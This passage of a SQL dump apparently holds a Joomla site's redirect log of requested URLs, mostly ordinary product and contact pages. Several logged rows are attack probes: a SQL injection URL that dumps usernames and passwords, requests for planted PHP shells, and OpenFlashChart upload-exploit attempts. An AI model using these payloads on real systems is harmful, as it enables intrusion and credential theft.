00:00:00',301),(5973,'http://www.3s-technologies.com.tr/index.php/en/?id=87&Itemid=103&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 15:52:46','0000-00-00 00:00:00',301),(5974,'http://www.3s-technologies.com.tr/index.php/en/?id=58&Itemid=149&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:56:34','0000-00-00 00:00:00',301),(5975,'http://www.3s-technologies.com.tr/index.php/en/?id=93&Itemid=104&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 16:02:10','0000-00-00 00:00:00',301),(5976,'http://www.3s-technologies.com.tr/index.php/en/?id=99&Itemid=43&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 16:09:34','0000-00-00 00:00:00',301),(5977,'http://www.3s-technologies.com.tr/index.php/en/?id=126&Itemid=133&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 16:14:53','0000-00-00 00:00:00',301),(5978,'http://www.3s-technologies.com.tr/index.php/tr/?id=56&Itemid=137&lang=en&option=com_content&view=category','','','',10,0,'2014-10-01 16:20:13','0000-00-00 00:00:00',301),(5979,'http://www.3s-technologies.com.tr/index.php/tr/?id=127&Itemid=134&lang=en&option=com_content&view=article','','','',11,0,'2014-10-01 16:23:43','0000-00-00 00:00:00',301),(5980,'http://www.3s-technologies.com.tr/index.php/tr/?catid=1:son-haberler&id=91:osai-neo&Itemid=28&lang=en&option=com_content&view=article','','','',64,0,'2014-10-01 16:27:14','0000-00-00 00:00:00',301),(5981,'http://www.3s-technologies.com.tr/index.php/tr/?id=82&Itemid=38&lang=en&option=com_content&view=article','','','',12,0,'2014-10-01 17:12:25','0000-00-00 00:00:00',301),(5982,'http://www.3s-technologies.com.tr/index.php/en/?id=39&Itemid=57&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 17:15:17','0000-00-00 00:00:00',301),(5983,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',34,0,'2014-10-01 17:16:13','0000-00-00 00:00:00',301),(5984,'http://www.3s-technologies.com.tr/index.php/en/?id=1&Itemid=28&lang=tr&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-01 17:16:27','0000-00-00 00:00:00',301),(5985,'http://www.3s-technologies.com.tr/index.php/tr/?id=39&Itemid=57&lang=en&option=com_content&view=category','','','',12,0,'2014-10-01 17:20:44','0000-00-00 00:00:00',301),(5986,'http://www.3s-technologies.com.tr/index.php/en/?id=88&Itemid=100&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 17:23:50','0000-00-00 00:00:00',301),(5987,'http://www.3s-technologies.com.tr/index.php/en/?id=124&Itemid=130&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 17:27:59','0000-00-00 00:00:00',301),(5988,'http://www.3s-technologies.com.tr/index.php/tr/?id=81&Itemid=40&lang=en&option=com_content&view=article','','','',15,0,'2014-10-01 17:32:47','0000-00-00 00:00:00',301),(5989,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121','','','',1,0,'2014-10-01 18:12:17','0000-00-00 00:00:00',301),(5990,'http://www.3s-technologies.com.tr/index.php/tr/?id=99&Itemid=43&lang=en&option=com_content&view=article','','','',11,0,'2014-10-01 18:17:06','0000-00-00 00:00:00',301),(5991,'http://www.3s-technologies.com.tr/index.php/tr/?id=88&Itemid=100&lang=en&option=com_content&view=article','','','',12,0,'2014-10-01 18:17:36','0000-00-00 00:00:00',301),(5992,'http://www.3s-technologies.com.tr/index.php/en/?id=99&Itemid=43&lang=tr&option=com_content&view=article','','','',3,0,'2014-10-01 18:17:56','0000-00-00 00:00:00',301),(5993,'http://www.3s-technologies.com.tr/index.php/en/?id=36&Itemid=37&lang=tr&option=com_content&view=category','','','',3,0,'2014-10-01 18:18:14','0000-00-00 00:00:00',301),(5994,'http://www.3s-technologies.com.tr/index.php/tr/?id=41&Itemid=55&lang=en&option=com_content&view=category','','','',12,0,'2014-10-01 18:19:51','0000-00-00 00:00:00',301),(5995,'http://www.3s-technologies.com.tr/index.php/tr/?id=1&Itemid=28&lang=en&layout=blog&option=com_content&view=category','','','',8,0,'2014-10-01 18:20:06','0000-00-00 00:00:00',301),(5996,'http://www.3s-technologies.com.tr/index.php/en/?id=41&Itemid=55&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:20:22','0000-00-00 00:00:00',301),(5997,'http://www.3s-technologies.com.tr/index.php/en/?id=58&Itemid=149&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 18:20:54','0000-00-00 00:00:00',301),(5998,'http://www.3s-technologies.com.tr/index.php/tr/?id=93&Itemid=104&lang=en&option=com_content&view=article','','','',3,0,'2014-10-01 18:21:20','0000-00-00 00:00:00',301),(5999,'http://www.3s-technologies.com.tr/index.php/en/?catid=1:son-haberler&id=91:osai-neo&Itemid=28&lang=tr&option=com_content&view=article','','','',30,0,'2014-10-01 18:21:36','0000-00-00 00:00:00',301),(6000,'http://www.3s-technologies.com.tr/index.php/tr/?id=1&Itemid=28&lang=tr&layout=blog&option=com_content&view=category','','','',8,0,'2014-10-01 18:22:00','0000-00-00 00:00:00',301),(6001,'http://www.3s-technologies.com.tr/index.php/tr/?id=59&Itemid=155&lang=en&option=com_content&view=category','','','',10,0,'2014-10-01 18:22:05','0000-00-00 00:00:00',301),(6002,'http://www.3s-technologies.com.tr/index.php/en/?id=60&Itemid=164&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 18:22:20','0000-00-00 00:00:00',301),(6003,'http://www.3s-technologies.com.tr/index.php/tr/?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',94,0,'2014-10-01 18:22:51','0000-00-00 00:00:00',301),(6004,'http://www.3s-technologies.com.tr/index.php/tr/?id=43&Itemid=2&lang=en&option=com_content&view=category','','','',12,0,'2014-10-01 18:23:06','0000-00-00 00:00:00',301),(6005,'http://www.3s-technologies.com.tr/index.php/tr/?id=49&Itemid=61&lang=en&option=com_content&view=category','','','',12,0,'2014-10-01 18:23:20','0000-00-00 00:00:00',301),(6006,'http://www.3s-technologies.com.tr/index.php/en/?id=90&Itemid=102&lang=tr&option=com_content&view=article','','','',3,0,'2014-10-01 18:25:07','0000-00-00 00:00:00',301),(6007,'http://www.3s-technologies.com.tr/index.php/en/?id=40&Itemid=60&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 18:25:38','0000-00-00 00:00:00',301),(6008,'http://www.3s-technologies.com.tr/index.php/tr/?id=46&Itemid=62&lang=en&option=com_content&view=category','','','',10,0,'2014-10-01 18:26:34','0000-00-00 00:00:00',301),(6009,'http://www.3s-technologies.com.tr/index.php/en/?id=42&Itemid=27&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:27:13','0000-00-00 00:00:00',301),(6010,'http://www.3s-technologies.com.tr/index.php/en/?id=125&Itemid=131&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 18:27:50','0000-00-00 00:00:00',301),(6011,'http://www.3s-technologies.com.tr/index.php/en/?id=168&Itemid=58&lang=tr&option=com_content&view=article','','','',1,0,'2014-10-01 18:28:27','0000-00-00 00:00:00',301),(6012,'http://www.3s-technologies.com.tr/index.php/tr/?id=40&Itemid=60&lang=en&option=com_content&view=category','','','',11,0,'2014-10-01 18:28:35','0000-00-00 00:00:00',301),(6013,'http://www.3s-technologies.com.tr/index.php/tr/?id=90&Itemid=102&lang=en&option=com_content&view=article','','','',13,0,'2014-10-01 18:28:47','0000-00-00 00:00:00',301),(6014,'http://www.3s-technologies.com.tr/index.php/tr/?id=126&Itemid=133&lang=en&option=com_content&view=article','','','',12,0,'2014-10-01 18:28:58','0000-00-00 00:00:00',301),(6015,'http://www.3s-technologies.com.tr/index.php/tr/?id=51&Itemid=92&lang=en&option=com_content&view=category','','','',21,0,'2014-10-01 18:29:06','0000-00-00 00:00:00',301),(6016,'http://www.3s-technologies.com.tr/index.php/tr/?id=1&Itemid=50&lang=en&layout=blog&option=com_content&view=category','','','',7,0,'2014-10-01 18:29:38','0000-00-00 00:00:00',301),(6017,'http://www.3s-technologies.com.tr/index.php/en/?id=53&Itemid=110&lang=tr&option=com_content&view=category','','','',3,0,'2014-10-01 18:29:51','0000-00-00 00:00:00',301),(6018,'http://www.3s-technologies.com.tr/index.php/tr/?id=44&Itemid=56&lang=en&option=com_content&view=category','','','',19,0,'2014-10-01 18:29:56','0000-00-00 00:00:00',301),(6019,'http://www.3s-technologies.com.tr/index.php/tr/?id=164&Itemid=160&lang=tr&option=com_content&view=article','','','',6,0,'2014-10-01 18:30:06','0000-00-00 00:00:00',301),(6020,'http://www.3s-technologies.com.tr/index.php/en/?id=54&Itemid=114&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:30:20','0000-00-00 00:00:00',301),(6021,'http://www.3s-technologies.com.tr/index.php/tr/?id=58&Itemid=149&lang=en&option=com_content&view=category','','','',12,0,'2014-10-01 18:30:26','0000-00-00 00:00:00',301),(6022,'http://www.3s-technologies.com.tr/index.php/en/?id=49&Itemid=61&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:30:36','0000-00-00 00:00:00',301),(6023,'http://www.3s-technologies.com.tr/index.php/en/?id=57&Itemid=145&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 18:30:44','0000-00-00 00:00:00',301),(6024,'http://www.3s-technologies.com.tr/index.php/en/?id=127&Itemid=134&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 18:32:57','0000-00-00 00:00:00',301),(6025,'http://www.3s-technologies.com.tr/index.php/en/?id=1&Itemid=50&lang=tr&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-01 18:34:59','0000-00-00 00:00:00',301),(6026,'http://www.3s-technologies.com.tr/index.php/en/?id=59&Itemid=155&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 18:37:00','0000-00-00 00:00:00',301),(6027,'http://www.3s-technologies.com.tr/index.php/en/?id=56&Itemid=137&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:39:01','0000-00-00 00:00:00',301),(6028,'http://www.3s-technologies.com.tr/index.php/en/?id=126&Itemid=133&lang=tr&option=com_content&view=article','','','',3,0,'2014-10-01 18:43:05','0000-00-00 00:00:00',301),(6029,'http://www.3s-technologies.com.tr/index.php/tr/?id=42&Itemid=27&lang=en&option=com_content&view=category','','','',11,0,'2014-10-01 18:48:57','0000-00-00 00:00:00',301),(6030,'http://www.3s-technologies.com.tr/index.php/en/?id=44&Itemid=56&lang=tr&option=com_content&view=category','','','',3,0,'2014-10-01 18:51:03','0000-00-00 00:00:00',301),(6031,'http://www.3s-technologies.com.tr/index.php/tr/?id=44&Itemid=56&lang=tr&option=com_content&view=category','','','',8,0,'2014-10-01 18:53:02','0000-00-00 00:00:00',301),(6032,'http://www.3s-technologies.com.tr/index.php/tr/?id=53&Itemid=110&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 18:59:01','0000-00-00 00:00:00',301),(6033,'http://www.3s-technologies.com.tr/index.php/en/?id=46&Itemid=62&lang=tr&option=com_content&view=category','','','',2,0,'2014-10-01 18:59:19','0000-00-00 00:00:00',301),(6034,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/?Itemid=82&id=73&lang=en&option=com_content&view=article','','','',4,0,'2014-10-01 19:23:07','0000-00-00 00:00:00',301),(6035,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/ana-sayfa','','','',12,0,'2014-10-01 21:29:25','0000-00-00 00:00:00',301),(6036,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=tr','','','',2,0,'2014-10-01 21:50:13','0000-00-00 00:00:00',301),(6037,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',2,0,'2014-10-01 22:58:45','0000-00-00 00:00:00',301),(6038,'http://led-bazaar.orghttp//led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108%3Ayuksek-guclu-flux-giderici-spr&catid=40%3Atemiz','',2,0,'2014-10-02 00:28:22','0000-00-00 00:00:00',301),(6039,'http://www.3s-technologies.com.trhttp//www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','',3,0,'2014-10-02 00:29:01','0000-00-00 00:00:00',301),(6040,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95','','','',5,0,'2014-10-02 01:15:26','0000-00-00 00:00:00',301),(6041,'http://www.3s-technologies.com.tr/index.php/en/home-page','','','',120,0,'2014-10-02 03:04:42','0000-00-00 00:00:00',301),(6042,'http://www.3s-technologies.com.tr/index.php/en/contacts','','','',109,0,'2014-10-02 06:17:56','0000-00-00 00:00:00',301),(6043,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',13,0,'2014-10-02 06:25:10','0000-00-00 00:00:00',301),(6044,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',3,0,'2014-10-02 06:38:19','0000-00-00 00:00:00',301),(6045,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',11,0,'2014-10-02 06:39:04','0000-00-00 00:00:00',301),(6046,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',4,0,'2014-10-02 06:40:04','0000-00-00 00:00:00',301),(6047,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content//images/stories/explore.gif','','','',2,0,'2014-10-02 07:10:16','0000-00-00 00:00:00',301),(6048,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',18,0,'2014-10-02 07:27:46','0000-00-00 00:00:00',301),(6049,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',1,0,'2014-10-02 07:30:41','0000-00-00 00:00:00',301),(6050,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/contacts','','','',44,0,'2014-10-02 09:03:35','0000-00-00 00:00:00',301),(6051,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/home-page','','','',28,0,'2014-10-02 09:23:44','0000-00-00 00:00:00',301),(6052,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',1,0,'2014-10-02 09:43:51','0000-00-00 00:00:00',301),(6053,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',2,0,'2014-10-02 13:14:23','0000-00-00 00:00:00',301),(6054,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/contacts','','','',8,0,'2014-10-02 20:35:01','0000-00-00 00:00:00',301),(6055,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN/**/sElecT/**/1,/*!concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7c,usertype)*//**//*!from*//**/jos_','','http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNi','',1,0,'2014-10-02 22:13:27','0000-00-00 00:00:00',301),(6056,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&141002-162950','','','',1,0,'2014-10-02 23:29:50','0000-00-00 00:00:00',301),(6057,'http://www.3s-technologies.com.tr/index.php?141002-162950','','','',1,0,'2014-10-02 23:29:50','0000-00-00 00:00:00',301),(6058,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&141002-162952','','','',1,0,'2014-10-02 23:29:52','0000-00-00 00:00:00',301),(6059,'http://www.3s-technologies.com.tr/index.php/tr/welcome.html','','','',14,0,'2014-10-03 07:48:06','0000-00-00 00:00:00',301),(6060,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/homepage2/81-english-uk/','','','',3,0,'2014-10-03 16:11:27','0000-00-00 00:00:00',301),(6061,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-10-04 03:23:20','0000-00-00 00:00:00',301),(6062,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-10-04 03:30:36','0000-00-00 00:00:00',301),(6063,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116','','','',1,0,'2014-10-04 03:39:52','0000-00-00 00:00:00',301),(6064,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148','','','',1,0,'2014-10-04 06:29:33','0000-00-00 00:00:00',301),(6065,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',1,0,'2014-10-04 07:04:00','0000-00-00 00:00:00',301),(6066,'http://3s-technologies.com.tr/index.php/en/contacts','','','',4,0,'2014-10-04 16:14:42','0000-00-00 00:00:00',301),(6067,'http://3s-technologies.com.tr/index.php/en/home-page','','','',3,0,'2014-10-05 03:20:56','0000-00-00 00:00:00',301),(6068,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/home-page','','','',6,0,'2014-10-05 06:55:41','0000-00-00 00:00:00',301),(6069,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',2,0,'2014-10-05 19:04:16','0000-00-00 00:00:00',301),(6070,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',1,0,'2014-10-06 23:19:28','0000-00-00 00:00:00',301),(6071,'http://www.3s-technologies.com.tr/index.php/products/manufacturer/','','','',1,0,'2014-10-07 09:24:24','0000-00-00 00:00:00',301),(6072,'http://3s-technologies.com.tr/index.php/contacts','','','',1,0,'2014-10-07 10:22:08','0000-00-00 00:00:00',301),(6073,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/contacts','','','',1,0,'2014-10-07 10:25:40','0000-00-00 00:00:00',301),(6074,'http://3s-technologies.com.tr/index.php/home-page','','','',3,0,'2014-10-07 10:50:51','0000-00-00 00:00:00',301),(6075,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/home-page','','','',1,0,'2014-10-07 10:54:18','0000-00-00 00:00:00',301),(6076,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/contacts','','','',1,0,'2014-10-07 12:04:26','0000-00-00 00:00:00',301),(6077,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128','','','',1,0,'2014-10-07 13:36:58','0000-00-00 00:00:00',301),(6078,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/food.php','','','',2,0,'2014-10-07 17:59:05','0000-00-00 00:00:00',301),(6079,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/petx.gif','','','',3,0,'2014-10-07 17:59:14','0000-00-00 00:00:00',301),(6080,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contact&view=category&catid=&lang=en&Itemid=0','','','',24,0,'2014-10-08 04:26:33','0000-00-00 00:00:00',301),(6081,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contact&view=category&catid=&lang=tr','','','',24,0,'2014-10-08 04:26:45','0000-00-00 00:00:00',301),(6082,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contact&view=category&catid=&lang=tr&Itemid=0','','','',24,0,'2014-10-08 04:27:01','0000-00-00 00:00:00',301),(6083,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',11,0,'2014-10-08 04:32:39','0000-00-00 00:00:00',301),(6084,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contact&view=category&catid=&lang=tr&Itemid=','','','',24,0,'2014-10-08 04:33:02','0000-00-00 00:00:00',301),(6085,'http://www.3s-technologies.com.tr/index.php/en/products&amp;sa=U&amp;ei=jl41VNzLKMqqPO7ygIgL&amp;ved=0COIBEBYwKzhk&amp;usg=AFQjCNFqFV3KsqLsVbA7b53-NoAyPrUvSg//images/stories/ViAr.php?rf','','','',1,0,'2014-10-08 15:58:09','0000-00-00 00:00:00',301),(6086,'http://www.3s-technologies.com.tr/index.php/en/products&amp;sa=U&amp;ei=jl41VNzLKMqqPO7ygIgL&amp;ved=0COIBEBYwKzhk&amp;usg=AFQjCNFqFV3KsqLsVbA7b53-NoAyPrUvSg/images/stories/food/tmp.php?clone','','','',1,0,'2014-10-08 15:58:10','0000-00-00 00:00:00',301),(6087,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-10-08 17:38:00','0000-00-00 00:00:00',301),(6088,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',1,0,'2014-10-09 13:36:21','0000-00-00 00:00:00',301),(6089,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-10-09 13:40:25','0000-00-00 00:00:00',301),(6090,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',2,0,'2014-10-09 14:08:46','0000-00-00 00:00:00',301),(6091,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',3,0,'2014-10-09 14:13:58','0000-00-00 00:00:00',301),(6092,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',1,0,'2014-10-09 14:24:48','0000-00-00 00:00:00',301),(6093,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',2,0,'2014-10-09 14:52:27','0000-00-00 00:00:00',301),(6094,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60','','','',1,0,'2014-10-09 14:56:57','0000-00-00 00:00:00',301),(6095,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-10-09 15:10:41','0000-00-00 00:00:00',301),(6096,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',2,0,'2014-10-09 15:59:23','0000-00-00 00:00:00',301),(6097,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',1,0,'2014-10-09 16:29:49','0000-00-00 00:00:00',301),(6098,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',3,0,'2014-10-09 17:22:01','0000-00-00 00:00:00',301),(6099,'http://3s-technologies.com.tr/index.php/tr/ana-sayfa','','','',14,0,'2014-10-09 18:10:22','0000-00-00 00:00:00',301),(6100,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139','','','',1,0,'2014-10-09 18:13:07','0000-00-00 00:00:00',301),(6101,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=37','','','',1,0,'2014-10-09 19:14:51','0000-00-00 00:00:00',301),(6102,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',1,0,'2014-10-09 22:21:47','0000-00-00 00:00:00',301),(6103,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',1,0,'2014-10-09 22:26:13','0000-00-00 00:00:00',301),(6104,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',1,0,'2014-10-09 22:50:40','0000-00-00 00:00:00',301),(6105,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',1,0,'2014-10-09 22:52:44','0000-00-00 00:00:00',301),(6106,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',1,0,'2014-10-09 22:53:14','0000-00-00 00:00:00',301),(6107,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',1,0,'2014-10-09 23:15:06','0000-00-00 00:00:00',301),(6108,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',1,0,'2014-10-09 23:22:10','0000-00-00 00:00:00',301),(6109,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',1,0,'2014-10-10 00:34:36','0000-00-00 00:00:00',301),(6110,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139','','','',1,0,'2014-10-10 01:54:00','0000-00-00 00:00:00',301),(6111,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',2,0,'2014-10-10 02:22:11','0000-00-00 00:00:00',301),(6112,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',2,0,'2014-10-10 03:30:46','0000-00-00 00:00:00',301),(6113,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',1,0,'2014-10-10 03:45:02','0000-00-00 00:00:00',301),(6114,'http://www.3s-technologies.com.tr//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',407,0,'2014-10-10 05:05:53','0000-00-00 00:00:00',301),(6115,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',18,0,'2014-10-10 07:26:40','0000-00-00 00:00:00',301),(6116,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:32','0000-00-00 00:00:00',301),(6117,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:33','0000-00-00 00:00:00',301),(6118,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:33','0000-00-00 00:00:00',301),(6119,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:33','0000-00-00 00:00:00',301),(6120,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:34','0000-00-00 00:00:00',301),(6121,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:34','0000-00-00 00:00:00',301),(6122,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:35','0000-00-00 00:00:00',301),(6123,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:35','0000-00-00 00:00:00',301),(6124,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:35','0000-00-00 